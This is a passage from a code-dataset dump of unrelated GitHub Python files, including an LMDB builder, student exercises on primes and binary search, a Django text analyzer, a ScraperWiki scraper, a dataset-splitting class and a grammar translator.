transform=None):\n\t\tself.db_path = db_path\n\t\tself.env = lmdb.open(db_path,\n\t\t subdir=os.path.isdir(db_path),\n\t\t readonly=True, lock=False,\n\t\t readahead=False, meminit=False)\n\t\twith self.env.begin() as txn:\n\t\t\tself.length = pickle.loads(txn.get(b'__len__'))\n\t\t\tself.keys = pickle.loads(txn.get(b'__keys__'))\n\t\tself.transform = transform\n\n\tdef __getitem__(self, index):\n\t\twith self.env.begin() as txn:\n\t\t\tbyteflow = txn.get(self.keys[index])\n\n\t\tIMAGE = pickle.loads(byteflow)\n\t\timgs, label, cid = IMAGE[0], IMAGE[1], IMAGE[2]\n\n\t\treturn imgs, label, cid\n\n\tdef __len__(self):\n\t\treturn self.length\n\n\ndef raw_reader(path):\n\twith open(path, 'rb') as f:\n\t\tbin_data = f.read()\n\treturn bin_data\n\n\ndef dumps_data(obj):\n\t\"\"\"\n\tSerialize an object.\n\tReturns:\n\t\tImplementation-dependent bytes-like object\n\t\"\"\"\n\treturn pickle.dumps(obj)\n\n\ndef folder2lmdb(dataset, dpath, name=\"train\", write_frequency=4000):\n\tdirectory = osp.expanduser(osp.join(dpath, name))\n\tprint(\"Loading dataset from %s\" % directory)\n\t# dataset = ImageFolder(directory, loader=raw_reader)\n\t# data_loader = DataLoader(dataset, num_workers=16, collate_fn=lambda x: x)\n\tdata_loader = dataset\n\n\tlmdb_path = osp.join(dpath, \"%s.lmdb\" % name)\n\tisdir = os.path.isdir(lmdb_path)\n\n\tprint(\"Generate LMDB to %s\" % lmdb_path)\n\tdb = lmdb.open(lmdb_path, subdir=isdir,\n\t map_size=int(1099511627776), readonly=False,\n\t meminit=False, map_async=True)\n\n\ttxn = db.begin(write=True)\n\tfor idx, data in enumerate(data_loader):\n\t\timage_paths, label, cid = data[0], data[1], data[2]\n\t\timgs = video_loader(image_paths)\n\n\t\ttxn.put(u'{}'.format(idx).encode('ascii'), dumps_data((imgs, label, cid)))\n\t\tdel imgs\n\t\tif idx % write_frequency == 0:\n\t\t\tprint(\"[%d/%d]\" % (idx, len(data_loader)))\n\t\t\ttxn.commit()\n\t\t\ttxn = db.begin(write=True)\n\n\t# finish iterating through dataset\n\ttxn.commit()\n\tkeys = [u'{}'.format(k).encode('ascii') for k in range(idx + 1)]\n\twith db.begin(write=True) as txn:\n\t\ttxn.put(b'__keys__', dumps_data(keys))\n\t\ttxn.put(b'__len__', dumps_data(len(keys)))\n\n\tprint(\"Flushing database ...\")\n\tdb.sync()\n\tdb.close()\n\n\nif __name__ == \"__main__\":\n\t# generate lmdb\n\tfolder2lmdb(\"/home/snowtiger/LXH/Data/Mars\", name=\"bbox_train\")\n","repo_name":"flysnowtiger/DCCT","sub_path":"Data2LMDB.py","file_name":"Data2LMDB.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"5627092643","text":"#Write some code that delivers the following features in a clean, clear, and reusable way.\r\n\r\n#Determines whether a given number is prime (whose only factors are 1 and the number itself). The approach you take should not use any library functions that provide pre-built prime related maths functions.\r\n#If the number is not prime, capture the factors in some appropriate data structure, and output them.\r\n#If the number is prime - output the string ‘Prime!’.\r\n\r\n#Hint: one way of determining if a number is prime, is to first calculate the factors of a number, and then to look at the number of factors found. To determine if a number is a factor of another, use the modulus operator (%) that gives the remainder of a division operation - a remainder of 0 means that the number is a factor. \r\n\r\n#In other words, 10 % 3 == 1 ( 3 goes into 10, thrice times (3 + 3 + 3 == 9), with a remainder of 1 (10 - 1) ). 3 is not a factor of 10.\r\n#10 % 5 == 0 (5 goes into 10 twice (5 + 5), with no remainder - 5 is a factor of 10!\t\r\n\r\n\r\n#Extension:\r\n\r\n#If you have time, extend your application to calculate all the prime numbers in a given range.\r\n#In other words, given a min of 10 and a max of 20, your code should return a structure representing 11, 13, 17, 19.\r\n\r\n\r\n#Part B\r\n\r\n#Create a user interface - console based or GUI - that presents the data modeled above. If implementing a graphical user interface (such as a mobile app, web application or desktop GUI), you may want to consider an appropriate layout that presents the data in a sensible way. Your solution should include any relevant source files - such as layout XML files, HTML or CSS.\r\n\r\n#Your application will need to store the data in memory. However, If you choose to use a database to write the data out to permanent storage, remember to include any files necessary to initialise the database (migrations / seeders etc).\r\n\r\n#The interface should enable a user to enter a number, and specify the bounds of the range that will be considered for prime-ness. The interface should output results of the requested operation.\r\n\r\n\r\n\r\ndef prime_or_not(user_input):\r\n\r\n start = 2\r\n\r\n # to check for change in status of prime or not.\r\n signal = 0\r\n\r\n # 2 is the only number which is even and prime. \r\n if(user_input == 2):\r\n print('Prime!')\r\n\r\n # if the number isnt 2, we use the code below to check for prime-ness\r\n while(start < int(user_input)):\r\n\r\n if(int(user_input)%start == 0):\r\n\r\n \r\n signal+=1\r\n break\r\n \r\n else:\r\n \r\n start +=1\r\n\r\n\r\n if(signal == 0):\r\n\r\n print('Prime!')\r\n \r\n\r\n else:\r\n \r\n print('Not Prime')\r\n new_list=[]\r\n start=1\r\n\r\n while(start < int(user_input)):\r\n\r\n if(int(user_input)%start == 0):\r\n\r\n new_list.append(start)\r\n start+=1\r\n else:\r\n continue\r\n\r\n print(new_list)\r\n \r\n\r\n\r\n\r\n#def storing_factors(your_number):\r\n\r\n \r\n \r\n\r\n# Asking user for the input\r\n\r\ninput_number = input('Enter a number of your choice.')\r\n\r\n\r\nprime_or_not(input_number)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n","repo_name":"amalprojects/Coding-projects","sub_path":"assessment.py","file_name":"assessment.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29104759065","text":"# pylint: disable=missing-docstring\n\nfrom pytest import mark\n\nfrom gitflow_easyrelease import is_semver\n\n\n@mark.parametrize(\n \"version,expected\",\n [\n ('v0.0.0', True),\n ('0.0.0', True),\n ('v1.2.3', True),\n ('1.2.3', True),\n ('vX.Y.Z', False),\n ('X.Y.Z', False),\n ('vqqq', False),\n ('qqq', False),\n ]\n)\ndef test_is_semver(version, expected):\n assert expected == is_semver(version)\n","repo_name":"wizardsoftheweb/gitflow-easyrelease","sub_path":"tests/test_is_semver.py","file_name":"test_is_semver.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71742432329","text":"from bisect import bisect_left, bisect_right\nimport sys\ninput = sys.stdin.readline\n\nn, x = map(int, input().split())\n\nnumbers = list(map(int, input().split()))\n\nleft = bisect_left(numbers, x)\nright = bisect_right(numbers, x)\n\nanswer = right-left\nif answer == 0:\n print(-1)\nelse:\n print(answer)\n\n# 7 2\n# 1 1 2 2 2 2 3\n\n# 7 4\n# 1 1 2 2 2 2 3","repo_name":"rbgksqkr/TIL","sub_path":"이코테/5. 이진탐색/Q27_정렬된배열에서특정수의개수구하기.py","file_name":"Q27_정렬된배열에서특정수의개수구하기.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2972173026","text":"def notas(* n, sit=False):\n \"\"\"\n\n -> Função para analisar notas e situações de vários alunos.\n :param n: uma ou mais notos dos alunos (aceita várias)\n :param sit: valor opcional, indicando se deve ou não adicionar a situação\n :return: dicionário com varias informações sobre a situação da turma\n \"\"\"\n cont = maior = menor = soma = 0\n\n for c in n:\n if cont == 0:\n maior = menor = c\n else:\n if c > maior:\n maior = c\n\n if c < menor:\n menor = c\n cont += 1\n soma += c\n media = soma / len(n)\n if sit:\n if media < 5:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'RUIM'}\n return ficha\n\n elif 5 <= media < 7:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'RAZOAVEL'}\n return ficha\n\n else:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'BOA'}\n return ficha\n\n else:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media}\n return ficha\n\n\nresp = notas(3.5, 2, 6.5, 2, 7, 4, sit=True)\nprint(resp)\n","repo_name":"Wedson-Mateus/python-curso-em-video","sub_path":"Exércicios/ex105.py","file_name":"ex105.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1425646297","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request, 'index.html')\n # return HttpResponse(\"Hello\")\n\ndef analyse(request):\n djtext = request.POST.get('text', 'default')\n removepunc = request.POST.get('removepunc', 'off')\n allcap = request.POST.get('allcap', 'off')\n nextlineremover = request.POST.get('nextlineremover', 'off')\n extraspaceremover = request.POST.get('extraspaceremover', 'off')\n\n if removepunc == 'on':\n analysed = ''\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n\n for char in djtext:\n if char not in punctuations:\n analysed += char\n\n params = {\"purpose\": \"Remove Punctuations\", \"analyse_text\": analysed}\n djtext = analysed\n\n if allcap == 'on':\n analysed = ''\n for char in djtext:\n analysed += char.upper()\n\n params = {\"purpose\": \"Capitalise all Text\", \"analyse_text\": analysed}\n djtext = analysed\n\n if nextlineremover == 'on':\n analysed = ''\n for char in djtext:\n if char != \"\\n\" and char != \"\\r\":\n analysed += char\n\n params = {\"purpose\": \"Remove next Lines\", \"analyse_text\": analysed}\n djtext = analysed\n\n if extraspaceremover == 'on':\n analysed = ''\n for index, char in enumerate(djtext):\n if djtext[index] == \" \" and djtext[index + 1] == \" \":\n pass\n else:\n analysed += char\n\n params = {\"purpose\": \"Remove Extra Space\", \"analyse_text\": analysed}\n\n return render(request, 'analyse.html', params)\n","repo_name":"amitgautam1994/TextAnalyse","sub_path":"pipeline/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36670080095","text":"import logging\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport time\ntf.enable_eager_execution()\nimport tensorflow_datasets as tfds\n\nfrom concurrent.futures import ProcessPoolExecutor\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef run(path):\n time.sleep(10)\n with open(path, \"r\", encoding=\"utf-8\") as f:\n text = \"\"\n for i in f.readlines():\n text += i + \" \"\n\n text_set = set(text.lower().split(\" \"))\n return text_set\n\n\n\n\ndef token_test():\n string=\"Create a list of partitioned variables according to the given slicing.\"\n f=open(r\"C:\\data\\tmp2\\ADA046646.txt\",\"r\",encoding=\"utf-8\").read()\n tokenizer = tfds.features.text.Tokenizer()\n\n vocabulary_set = set()\n list=[]\n texts=[]\n for file in os.listdir(r\"C:\\data\\tmp2\"):\n f = open(r\"C:/data/tmp2/\"+file, \"r\", encoding=\"utf-8\").read()\n st=tokenizer.tokenize(f)\n vocabulary_set.update(st)\n list.append(st.__len__())\n # print(st)\n\n list=sorted(list)\n print(list[int(list.__len__()/2)],list)\n # print(vocabulary_set.__len__())\n # encoder = tfds.features.text.TokenTextEncoder(vocabulary_set)\n # list=encoder.encode(string)\n # print(type(list))\n # print(encoder.encode(st))\n # print(vocabulary_set)\n\n\ndef select_data():\n writer = open(r\"C:\\temp\\subject_file_1000.txt\", \"w+\", encoding=\"utf-8\")\n dir=r\"C:\\temp\\classification\"\n temp={}\n with open(r\"C:\\Users\\zhaozhijie.CNPIEC\\Desktop\\new_temp_subject_file.txt\",encoding=\"utf-8\") as f:\n for line in f.readlines():\n item=line.split(\"##\")\n if item[0] in temp.keys():\n temp[item[0]].append(line)\n else:\n temp[item[0]]=[line]\n for i in range(1000):\n for key in temp.keys():\n if len(temp[key])>1000:\n writer.write(temp[key][i])\n # writer1 = open(os.path.join(dir,key+\".txt\"), \"w+\", encoding=\"utf-8\")\n # for index,line in enumerate(temp[key]):\n # writer1.write(line)\n\n\n\n\n\nif __name__ == '__main__':\n # select_data()\n import pydot\n # token_test()\n # x = [[1, 2, 3],\n # [1, 2, 3]]\n #\n # xx = tf.cast(x, tf.float32)\n #\n # mean_all = tf.reduce_mean(xx, keep_dims=False)\n # mean_0 = tf.reduce_mean(xx, axis=0, keep_dims=False)\n # mean_1 = tf.reduce_mean(xx, axis=1, keep_dims=False)\n # print(mean_all,mean_0,mean_1)\n # Nonparallel code\n # data=[\n # r\"C:\\data\\text_classification\\result_subject\\DE200615017155.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N8625307.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N140011168.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\DE200615017183.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N150009463.txt\"\n # ]\n # s=time.time()\n # results = map(run, data)\n #\n # for r in results:\n # print(r)\n # e = time.time()\n #\n # print(\"时间:\", e - s)\n #\n # s = time.time()\n # # Parallel implementation\n # with ProcessPoolExecutor() as pool:\n # # with ThreadPoolExecutor(128) as pool:\n #\n # results = pool.map(run, data)\n # for r in results:\n # print(r)\n #\n # e = time.time()\n #\n # print(\"时间:\", e - s)","repo_name":"hrl13260130208/TensorFlow_test","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15853135902","text":"# region imports\nfrom AlgorithmImports import *\n# endregion\n\nclass SmoothOrangeHyena(QCAlgorithm):\n\n def Initialize(self):\n self.SetStartDate(2010, 1, 1) # Set Start Date\n self.SetEndDate(2015,1,1)\n self.SetCash(100000) # Set Strategy Cash\n self.stock = self.AddEquity(\"SPY\",Resolution.Daily)\n\n self.Invest=True\n\n\n def OnData(self, data: Slice):\n if not self.Portfolio.Invested and self.Invest:\n self.MarketOrder(self.stock.Symbol,1000)\n self.Invest=False\n\n if self.Time == datetime(day=1,month=1,year=2014):\n self.MarketOrder(self.stock.Symbol, -1000)","repo_name":"rkaelle/algo-trading-strategies","sub_path":"MarketOrder.py","file_name":"MarketOrder.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7595596981","text":"import numpy as np\nimport math\nimport os\nimport shutil\n\nclass train_test_val_split_class:\n def __init__(self, dataset_dir_name, txt_filename, ratio):\n \"\"\"\n INPUTS:\n ::string:: dataset_dir_name #FULL path of the original dataset\n ::string:: txt_filename #Base path (not full path) of the txt label file\n ::tuple of 3 floats:: ratio #tuple of 3 elements containing the train, val, test ratio\n \"\"\"\n self.dataset_dir_name = dataset_dir_name\n self.root = os.path.dirname(self.dataset_dir_name) #directory in which dataset_dir_name is in\n self.dataset_dir = os.path.join(self.root, dataset_dir_name) #directory of original dataset\n\n # self.splitted_dataset_dir = os.path.join(self.root, 'splitted_dataset') #directory of splitted dataset\n\n #OLD (2020):\n #self.splitted_dataset_dir = os.path.join(self.root, 'splitted_dataset_' + str(ratio[0]) + '_' + str(ratio[1]) + '_' + str(ratio[2])) #directory of splitted dataset\n #NEW (Jan. 31, 2021):\n self.splitted_dataset_dir = os.path.join(self.root, 'splitted_' + os.path.basename(dataset_dir_name) + '_' + str(ratio[0]) + '_' + str(ratio[1]) + '_' + str(ratio[2])) #directory of splitted dataset\n\n self.train_dir = os.path.join(self.splitted_dataset_dir, 'train')\n self.val_dir = os.path.join(self.splitted_dataset_dir, 'val')\n self.test_dir = os.path.join(self.splitted_dataset_dir, 'test')\n self.txt_filename = os.path.join(self.dataset_dir, txt_filename) #full filename of txt label file\n self.ratio = ratio #tuple of 3 elements containing: train, val, test ratio\n np.random.seed(1000)\n\n def get_split_houses(self, ratio):\n \"\"\"\n Returns 3 lists which are the house numbers for train, val, test\n INPUTS:\n ::tuple of size 3:: ratio #train, val, test\n OUTPUTS:\n ::list:: train_house_numbers #train\n ::list:: val_house_numbers #val\n ::list:: house_numbers #test\n \"\"\"\n num_images = 0 #total number of images\n for entry in os.scandir(self.dataset_dir):\n if entry.is_file() and (not entry.path.endswith(\".txt\")):\n num_images += 1\n num_houses = int(num_images / 4) #total number of houses\n print(num_houses)\n\n num_train = int(math.floor(num_houses * ratio[0])) #number of houses for training\n num_val = int(math.ceil(num_houses * ratio[1])) #number of houses for validation\n num_test = int(math.floor(num_houses * ratio[2])) #number of houses for test\n\n print(\"train, val, test:\", num_train, num_val, num_test, \"\\n\\n\")\n\n house_numbers = [i for i in range(1,num_houses+1,1)] #list of numbers from 1 to num_houses\n\n train_house_numbers = [] #house numbers for train\n for i in range(0,num_train,1): #randomly pick num_train houses for train\n pick_num = np.random.randint(0,len(house_numbers))\n pick = house_numbers[pick_num]\n train_house_numbers += [pick]\n house_numbers.remove(pick)\n\n val_house_numbers = [] #house numbers for val\n for i in range(0,num_val,1): #randomly pick num_val houses for val\n pick_num = np.random.randint(0,len(house_numbers))\n pick = house_numbers[pick_num]\n val_house_numbers += [pick]\n house_numbers.remove(pick)\n\n #Note: whatever house numbers that have not been picked will be for test\n '''\n print(train_house_numbers, \"\\n\")\n print(val_house_numbers, \"\\n\")\n print(house_numbers, \"\\n\")\n print(\"Total:\", len(train_house_numbers) + len(val_house_numbers) + len(house_numbers))\n '''\n return train_house_numbers, val_house_numbers, house_numbers #train, val, test\n\n def write_to_test(self, test_list, house_info_filename, result_filename):\n house_info = self.get_house_info_list(house_info_filename)\n f = open(result_filename, 'w')\n for house_num in test_list:\n target_house_info = house_info[house_num-1]\n f.write(target_house_info)\n f.close()\n return True\n\n def get_house_info_list(self, filename):\n #Reading in file\n f = open(filename, \"r\")\n housing_info_list = []\n for line in f:\n housing_info_list.append(line)\n f.close()\n return housing_info_list\n\n #get_house_info_list(txt_filename)\n def train_test_val_split(self, ratio, house_info_filename):\n if os.path.isdir(self.splitted_dataset_dir) == False:\n os.mkdir(self.splitted_dataset_dir)\n if os.path.isdir(self.train_dir) == False:\n os.mkdir(self.train_dir)\n if os.path.isdir(self.test_dir) == False:\n os.mkdir(self.test_dir)\n if os.path.isdir(self.val_dir) == False:\n os.mkdir(self.val_dir)\n\n train_house_numbers, val_house_numbers, test_house_numbers = self.get_split_houses(ratio)\n self.write_to_test(train_house_numbers, house_info_filename, os.path.join(self.train_dir, 'train_HousesInfo.txt'))\n self.write_to_test(val_house_numbers, house_info_filename, os.path.join(self.val_dir, 'val_HousesInfo.txt'))\n self.write_to_test(test_house_numbers, house_info_filename, os.path.join(self.test_dir, 'test_HousesInfo.txt'))\n\n for entry in os.scandir(self.dataset_dir):\n if entry.is_file() and (not entry.path.endswith(\".txt\")):\n entry_string = os.path.basename(entry) #just the filename, not the full path\n splitted = entry_string.split(\"_\")\n if splitted[0]=='.DS':\n continue\n else:\n filenum = int(splitted[0]) #file number of current file\n\n if filenum in train_house_numbers:\n shutil.copy(entry.path,self.train_dir) #copy image to train_dir\n elif filenum in val_house_numbers:\n shutil.copy(entry.path,self.val_dir) #copy image to val_dir\n elif filenum in test_house_numbers:\n shutil.copy(entry.path,self.test_dir) #copy image to test_dir\n\n return True\n\n def do_split(self):\n self.train_test_val_split(self.ratio, self.txt_filename)\n return True\n\n#if you only want to do the split and no augmentation, uncomment below:\n'''\ndataset_full_path = 'C:/Users/Matthew/Desktop/UTMIST/raw_dataset' #change the path accordingly\ntrain_val_test_ratio = (0.70,0.10,0.20)\ntxt_filename_raw = 'HousesInfo.txt'\nobj = train_test_val_split_class(dataset_full_path, txt_filename_raw, train_val_test_ratio)\nobj.do_split()\n'''\n","repo_name":"UTMIST/RealValue","sub_path":"train_test_val_split_class.py","file_name":"train_test_val_split_class.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"3907047559","text":"import json\nimport urllib\n\nfrom ebdata.retrieval.scrapers import newsitem_list_detail\n\n\nclass ScraperWikiScraper(newsitem_list_detail.NewsItemListDetailScraper):\n \"\"\"OpenBlock scraper class to extract data from ScraperWiki data sources\"\"\"\n\n url = \"http://api.scraperwiki.com/api/1.0/datastore/sqlite\"\n list_filter = None\n ordering = None\n limit = 50\n\n def get_query(self, select='*', limit=10, offset=0):\n where = ''\n if self.list_filter:\n parts = []\n for key, val in self.list_filter.iteritems():\n parts.append(\"{0} = '{1}'\".format(key, val))\n where = ' AND '.join(parts)\n query = ['SELECT {0} FROM `swdata`'.format(select)]\n if where:\n query.append('WHERE {0}'.format(where))\n if self.ordering:\n query.append('ORDER BY {0}'.format(self.ordering))\n if limit > 0:\n query.append('LIMIT {0}'.format(limit))\n if offset > 0:\n query.append('OFFSET {0}'.format(offset))\n query = ' '.join(query)\n self.logger.debug(query)\n return query\n\n def get_url(self, query):\n args = {'name': self.scraper_name, \"format\": \"jsondict\",\n \"query\": query}\n url = \"{0}?{1}\".format(self.url, urllib.urlencode(args))\n self.logger.info(url)\n return self.get_html(url)\n\n def count(self):\n query = self.get_query(select='COUNT(*) AS count', limit=0, offset=0)\n data = json.loads(self.get_url(query=query))[0]\n return data['count']\n\n def list_pages(self):\n count = self.count()\n offset = 0\n while offset < count:\n yield self.get_url(query=self.get_query(limit=self.limit,\n offset=offset))\n offset += self.limit\n\n def parse_list(self, data):\n for row in json.loads(data):\n self.stats['Downloaded'] += 1\n self.logger_extra['Row'] = \"%s-%s\" % (self.logger_extra['Run'],\n self.stats['Downloaded'])\n self.geocode_log = None\n yield row\n","repo_name":"OpenData-NC/columbus-county-nc","sub_path":"openrural/retrieval/base/scraperwiki.py","file_name":"scraperwiki.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"43012941391","text":"import random\nimport matplotlib.pyplot as plt\nimport networkx as nx\n# import pygraphviz as pgv\nfrom networkx.drawing.nx_agraph import to_agraph\nimport my_networkx as my_nx\nfrom anytree import Node, RenderTree\n\n\nclass translator:\n Rules = {}\n VN, VT = [], []\n target_symbol = 's'\n endings = []\n EPS = chr(1)\n\n def Read(self, filename):\n f = open(filename)\n lines = f.readlines()\n index1 = lines[0].find('{')\n index2 = lines[0].find('}')\n self.VT = lines[0][index1 + 1: index2].split(',')\n line = lines[0][index2 + 1:]\n index1 = line.find('{')\n index2 = line.find('}')\n self.VN = line[index1 + 1: index2].split(',')\n self.target_symbol = line[len(line) - 3]\n print('VT :', self.VT)\n print('VN :', self.VN)\n print('Целевой символ :', self.target_symbol)\n for i in range(2, len(lines)):\n lines[i] = lines[i].strip('\\n')\n if lines[i] == \"P:\":\n continue\n term = lines[i][:lines[i].find('-')]\n if '|' in lines[i]:\n self.Rules[term] = lines[i][lines[i].find('-->') + 3:].split('|')\n if lines[i].endswith('|'):\n self.Rules[term].append(self.EPS)\n else:\n self.Rules[term] = lines[i][lines[i].find('-->') + 3]\n try:\n self.endings.extend(self.Rules[term])\n except:\n print(\"Ошибка\")\n res = '|'.join(value for value in self.Rules[term])\n print(term, '-->', res)\n\n def Write(self):\n index, length = 0, 0\n iterations = 0\n replacement = ''\n output = self.target_symbol\n print(output, end='')\n while (index < len(output)):\n if iterations > 30:\n break\n if output[index] in self.VT:\n replacement = random.choice(self.Rules[output[index]])\n if replacement == self.EPS:\n replacement = ''\n output = output.replace(output[index], replacement, 1)\n print(' -->', output, end='')\n iterations += 1\n else:\n index += 1\n if (iterations > 30):\n print('\\nЧисло итераций превысило 30')\n else:\n print(f'\\nЧисло итераций {iterations}')\n return output\n\n def IsIn(self, word):\n family_tree = TreeNode.build_family_tree(TreeNode, word)\n # вывод дерева\n TreeNode.dfs(TreeNode, family_tree)\n paths = list(TreeNode.findS(TreeNode, family_tree))\n if len(paths) > 0:\n print(*paths, sep='\\n')\n print('Цепочка принадлежит грамматике')\n else:\n print(\"Цепочка не принадлежит грамматике\")\n\n\n\n\n def GetKeyByValue(value):\n for key in translator.Rules.keys():\n if value in translator.Rules[key]:\n return key\n else:\n raise ValueError('Нет такого значения')\n\n # Варианты на что можно свернуть нулевой, первый или первые 2 символа\n def GetListOfKeys(self, value):\n vars = []\n\n for key in translator.Rules.keys():\n if value != '':\n if value[0] in translator.Rules[key] or value[:2] in translator.Rules[key]:\n vars.append(key)\n if translator.EPS in translator.Rules[key] and value[0] in self.VN:\n vars.append(key)\n else:\n if translator.EPS in translator.Rules[key]:\n vars.append(key)\n return vars\n\n # свёртка по заданному варианту\n def fold(self, word, replace=None):\n result = ''\n if replace != None:\n begin = translator.Rules[replace]\n for val in begin:\n if word.startswith(val):\n result = replace + word[len(val):]\n break\n elif val == translator.EPS and word[0] in self.VN:\n result = replace + word\n break\n total = 0\n for term in self.VT:\n total += result.count(term)\n if total > 1:\n return word\n else:\n return result\n else:\n if word[:2] in translator.endings:\n word = translator.GetKeyByValue(word[:2]) + word[2:]\n else:\n word = translator.GetKeyByValue(word[0]) + word[1:]\n return word\n\n def DrawGraph(self):\n G = nx.DiGraph(directed=True)\n G.add_node('H')\n G.add_nodes_from(self.VT)\n\n labels_edges = {}\n # добавление ребер и меток к ним\n for term in self.Rules.keys():\n for value in self.Rules[term]:\n if len(value) == 1:\n # если конечный символ (a,b)\n if value in self.VN:\n edge = ('H', term)\n if labels_edges.get(edge) != None:\n labels_edges[edge] = labels_edges[edge] + ',' + value\n else:\n labels_edges[edge] = value\n G.add_edge('H', term)\n # если терминальный символ\n else:\n # метка для такого ребра не нужна\n G.add_edge(value, term)\n # G.add_edge(value, term)\n elif len(value) == 2:\n edge = (value[0], term)\n if labels_edges.get(edge) != None:\n labels_edges[edge] = labels_edges[edge] + ',' + value[1]\n else:\n labels_edges[edge] = value[1]\n G.add_edge(value[0], term)\n\n for edge in G.edges():\n if edge[0] == edge[1]:\n self.LoopGraph(self, G.edges(), labels_edges)\n return\n curved_edges = [edge for edge in G.edges() if edge[::-1] in G.edges() and edge[::-1] != edge]\n straight_edges = list(set(G.edges() - set(curved_edges)))\n circle_edges = [edge for edge in G.edges() if edge == edge[::-1]]\n\n pos = nx.spring_layout(G, seed=5)\n fig, ax = plt.subplots()\n\n nx.draw_networkx_nodes(G, pos, ax=ax)\n nx.draw_networkx_labels(G, pos, ax=ax)\n labels_curved = {edge: labels_edges[edge] for edge in labels_edges.keys() if edge in curved_edges}\n labels_straight = {edge: labels_edges[edge] for edge in labels_edges.keys() if edge in straight_edges}\n\n # прямые ребра\n nx.draw_networkx_edges(G, pos, ax=ax, edgelist=straight_edges)\n # загнутые ребра\n arc_rad = 0.25\n nx.draw_networkx_edges(G, pos, ax=ax, edgelist=curved_edges, connectionstyle=f'arc3, rad = {arc_rad}',\n arrows=True)\n\n # метки для загнутых ребер\n my_nx.my_draw_networkx_edge_labels(G, pos, ax=ax, edge_labels=labels_curved, rotate=False, rad=arc_rad)\n # метки для прямых ребер\n nx.draw_networkx_edge_labels(G, pos, ax=ax, edge_labels=labels_straight, rotate=False)\n\n plt.axis('off')\n plt.show()\n\n fig.savefig(\"диаграмма состояний.png\", bbox_inches='tight', pad_inches=0)\n\n def LoopGraph(self, edges, labels_edges):\n G = nx.MultiDiGraph()\n\n # add edges\n for edge in edges:\n if edge[0] == edge[1]:\n G.add_edge(edge[0], edge[1], color='red')\n else:\n G.add_edge(edge[0], edge[1])\n\n # print(G.edges(data=True))\n G.graph['edge'] = {'arrowsize': '0.6', 'splines': 'curved'}\n G.graph['graph'] = {'scale': '3'}\n\n A = to_agraph(G)\n\n A.graph_attr['strict'] = True\n A.graph_attr['rankdir'] = 'LR'\n A.layout('dot')\n\n # set edge labels\n for pair in labels_edges:\n edge = A.get_edge(pair[0], pair[1])\n edge.attr['label'] = str(labels_edges[pair]) + \" \"\n\n A.draw('диаграмма состояний (петля).png')\n\n\nclass TreeNode:\n IsIn = False\n def __init__(self, data):\n self.data = data\n self.children = []\n\n def build_family_tree(self, data):\n root = TreeNode(data)\n vars = translator.GetListOfKeys(translator, data)\n if vars is None:\n return\n for var in vars:\n newword = translator.fold(translator, data, var)\n if newword == 'S':\n self.IsIn = True\n child = self.build_family_tree(self, newword)\n root.children.append(child)\n # self.build_family_tree(newword)\n\n return root\n\n def dfs(self, node, level=0):\n indent = \" \" * level * 4\n print(indent + str(node.data))\n for child in node.children:\n self.dfs(self, child, level + 1)\n\n def findS(self, node):\n if node.children != []:\n for child in node.children:\n yield from ([node.data] + arr for arr in self.findS(self, child))\n #если лист дерева\n else:\n if node.data == 'S':\n yield [node.data]\n","repo_name":"doresolla/Translation-Methods","sub_path":"tr.py","file_name":"tr.py","file_ext":"py","file_size_in_byte":9559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12612753743","text":"#Time complexity: O(n^2):\r\n\r\ndef firstnonrepeating(s):\r\n\tfor i in range(len(s)):\r\n\t\tduplicate_seen = False\r\n\t\tfor j in range(len(s)):\r\n\t\t\tif s[i] == s[j] and i != j:\r\n\t\t\t\tduplicate_seen = True\r\n\t\t\t\tbreak\r\n\t\tif not duplicate_seen:\r\n\t\t\treturn s[i]\r\n\treturn '_'\r\n\r\n#print(firstnonrepeating(input(\"Enter string: \")))\r\n\r\n#Time complexity: O(2n) or O(n)\r\n\r\ndef firstnonrepeating_simp(s):\r\n\tfreq = {}\r\n\tfor i in range(len(s)):\r\n\t\tif s[i] in freq:\r\n\t\t\tfreq[s[i]] += 1\r\n\t\telse:\r\n\t\t\tfreq[s[i]] = 1\r\n\r\n\tfor i in range(len(s)):\r\n\t\tif freq[s[i]] == 1:\r\n\t\t\treturn s[i]\r\n\r\n\treturn 